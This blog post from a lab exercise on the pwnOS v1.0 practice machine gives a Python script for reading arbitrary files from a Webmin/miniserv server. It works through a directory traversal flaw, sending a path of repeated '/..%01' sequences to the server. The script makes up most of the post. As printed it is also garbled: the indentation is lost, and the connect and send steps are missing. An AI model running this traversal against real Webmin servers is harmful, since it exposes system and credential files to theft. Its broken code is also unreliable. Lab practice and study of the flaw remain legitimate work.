Saturday, March 8, 2014

pwnOS v1.0 Python Script for Reading files through Directory Traversal

I was working with the pwnOS v1.0 to be able to gain root.  One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem.  I liked the metasploit module but I found that I wanted a quicker script and something I could save the output with.  I then designed the following script using python:


# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability.  This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit.  You can also redirect the output to a file.

import socket
import os, sys
import urllib

if len(sys.argv) > 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        # Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]

httpRequest = "GET " + url + " HTTP/1.1\n"
httpRequest += "Host:\n\n"

for i in range(1,15):
data = s.recv(1024)
print data

print "Usage: ./ file"
print "The file in this case is any file on the file system you can pull.\n\n"

No comments:

Post a Comment

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refr...